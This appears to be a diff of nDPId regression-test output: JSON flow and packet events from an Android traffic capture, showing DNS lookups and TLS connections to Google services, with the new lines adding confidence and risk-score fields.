-00854{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
+00775{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454867723,"flow_last_seen":1582454867723,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"ts_msec":1582454867723,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00960{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454867688,"flow_last_seen":1582454867759,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":166,"flow_tot_l4_payload_len":166,"flow_avg_l4_payload_len":41,"midstream":0,"ts_msec":1582454867759,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":2,"flow_last_seen":1582454867761,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":95,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":95,"pkt_l4_len":61,"ts_msec":1582454867761,"pkt":"TGr2n\/YnxiwDYGpkCABFAABRO4cAAEARubPAqAIBwKgCEAA11jUAPbDuteeBgAABAAEAAAAABHBsYXkKZ29vZ2xlYXBpcwNjb20AAAEAAcAMAAEAAQAAARgABKzZFEo="}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454867761,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}}
-00913{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
-02243{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15":"TLS (probably) not carrying HTTPS"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":102,"source":"android.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454867723,"flow_last_seen":1582454867761,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":53,"flow_tot_l4_payload_len":90,"flow_avg_l4_payload_len":45,"midstream":0,"ts_msec":1582454867761,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":54837,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.GoogleServices","breed":"Acceptable","category":"Web"},"dns": {"query":"play.googleapis.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.20.74"}}
+01019{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454867688,"flow_last_seen":1582454867788,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1584,"flow_avg_l4_payload_len":264,"midstream":0,"ts_msec":1582454867788,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256"}}
+02349{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"android.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454867688,"flow_last_seen":1582454867789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3887,"flow_avg_l4_payload_len":485,"midstream":0,"ts_msec":1582454867789,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"216.239.38.120","src_port":32974,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Google","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"clients1.google.com","server_names":"*.google.com,*.android.com,*.appengine.google.com,*.cloud.google.com,*.crowdsource.google.com,*.g.co,*.gcp.gvt2.com,*.gcpcdn.gvt1.com,*.ggpht.cn,*.gkecnapps.cn,*.google-analytics.com,*.google.ca,*.google.cl,*.google.co.in,*.google.co.jp,*.google.co.uk,*.google.com.ar,*.google.com.au,*.google.com.br,*.google.com.co,*.google.com.mx,*.google.com.tr,*.google.com.vn,*.google.de,*.google.es,*.google.fr,*.google.hu,*.google.it,*.google.nl,*.google.pl,*.google.pt,*.googleadapis.com,*.googleapis.cn,*.googlecnapps.cn,*.googlecommerce.com,*.googlevideo.com,*.gstatic.cn,*.gstatic.com,*.gstaticcnapps.cn,*.gvt1.com,*.gvt2.com,*.metric.gstatic.com,*.urchin.com,*.url.google.com,*.wear.gkecnapps.cn,*.youtube-nocookie.com,*.youtube.com,*.youtubeeducation.com,*.youtubekids.com,*.yt.be,*.ytimg.com,android.clients.google.com,android.com,developer.android.google.cn,developers.android.google.cn,g.co,ggpht.cn,gkecnapps.cn,goo.gl,google-analytics.com,google.com,googlecnapps.cn,googlecommerce.com,source.android.google.cn,urchin.com,www.goo.gl,youtu.be,youtube.com,youtubeeducation.com,youtubekids.com,yt.be","ja3":"c60d01d600aacc2c04844595ce224279","ja3s":"b31c0b82752ea0e2c48b8ce46e9263e5","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.google.com","fingerprint":"80:50:28:F4:84:F5:C4:C6:41:DE:75:67:38:C4:A6:E2:59:FF:75:42"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868348,"flow_last_seen":1582454868348,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454868348,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":123,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1582454868348,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454868348,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8A3VAAEAGs2vAqAIQrNkUSs0GAbvbqzdvAAAAAKAC\/\/+uLAAAAgQFtAQCCAr\/\/zQaAAAAAAEDAwg="}
 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":124,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":2,"flow_last_seen":1582454868386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454868386,"pkt":"TGr2n\/YnxiwDYGpkCABFAAA8PjQAAHUGg6ys2RRKwKgCEAG7zQbWjo3E26s3cKAS6yAJ1AAAAgQFZAQCCAq9hJee\/\/80GgEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":125,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":1582454868386,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"ts_msec":1582454868386,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA0A3ZAAEAGs3LAqAIQrNkUSs0GAbvbqzdw1o6NxYAQAVciEQAAAQEICv\/\/NCS9hJee"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454868348,"flow_last_seen":1582454868424,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":185,"flow_tot_l4_payload_len":185,"flow_avg_l4_payload_len":46,"midstream":0,"ts_msec":1582454868424,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1"}}
 00571{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":1582454868462,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"ts_msec":1582454868462,"pkt":"xiwDYGpkTGr2n\/YnCABFAABLqjFAAEARCw\/AqAIQwKgCAbfpADUAN\/8RnJ4BAAABAAAAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAE="}
-00750{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00883{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
-01557{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}}
+00776{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868462,"flow_last_seen":1582454868462,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"ts_msec":1582454868462,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00909{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":129,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":1603,"flow_avg_l4_payload_len":267,"midstream":0,"ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1"}}
+01583{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":131,"source":"android.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1582454868348,"flow_last_seen":1582454868466,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1418,"flow_tot_l4_payload_len":3177,"flow_avg_l4_payload_len":397,"midstream":0,"ts_msec":1582454868466,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.20.74","src_port":52486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.GoogleServices","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.googleapis.com","server_names":"*.storage.googleapis.com,*.appspot.com.storage.googleapis.com,*.commondatastorage.googleapis.com,*.content-storage-download.googleapis.com,*.content-storage-upload.googleapis.com,*.content-storage.googleapis.com,*.googleapis.com,*.storage-download.googleapis.com,*.storage-upload.googleapis.com,*.storage.select.googleapis.com,commondatastorage.googleapis.com,storage.googleapis.com,storage.select.googleapis.com,unfiltered.news","ja3":"d8c87b9bfde38897979e41242626c2f3","ja3s":"eca9b8f0f3eae50309eaf901cb822d9b","unsafe_cipher":0,"cipher":"TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Google Trust Services, CN=GTS CA 1O1","subjectDN":"C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.storage.googleapis.com","alpn":"http\/1.1","fingerprint":"BA:BA:BA:55:69:9F:E0:BD:48:80:23:A4:B3:AD:C1:FF:EA:4E:17:C9"}}
 00514{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1582454868503,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1582454868503,"pkt":"TGr2n\/YnxiwDYGpkCABFAABbmZAAAEARW6DAqAIBwKgCEAA1t+kAR93wnJ6BgAABAAEAAAAAEWNvbm5lY3Rpdml0eWNoZWNrB2dzdGF0aWMDY29tAAABAAHADAABAAEAAACxAASs2RID"}
-00771{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1582454868503,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.18.3"}}
+00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":135,"source":"android.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454868462,"flow_last_seen":1582454868503,"flow_idle_time":180000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":110,"flow_avg_l4_payload_len":55,"midstream":0,"ts_msec":1582454868503,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"192.168.2.1","src_port":47081,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Google","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"connectivitycheck.gstatic.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"172.217.18.3"}}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868511,"flow_last_seen":1582454868511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454868511,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36888,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":136,"source":"android.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":1582454868511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454868511,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8PG9AAEAGfLjAqAIQrNkSA5AYAbuCdQgsAAAAAKAC\/\/91sgAAAgQFtAQCCAr\/\/zRDAAAAAAEDAwg="}
 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454868527,"flow_last_seen":1582454868527,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1582454868527,"l3_proto":"ip4","src_ip":"192.168.2.16","dst_ip":"172.217.18.3","src_port":36890,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":137,"source":"android.pcap","alias":"nDPId-test","flow_id":28,"flow_packet_id":1,"flow_last_seen":1582454868527,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1582454868527,"pkt":"xiwDYGpkTGr2n\/YnCABFAAA8stVAAEAGBlLAqAIQrNkSA5AaAbtdpoaTAAAAAKAC\/\/8cFQAAAgQFtAQCCAr\/\/zRGAAAAAAEDAwg="}
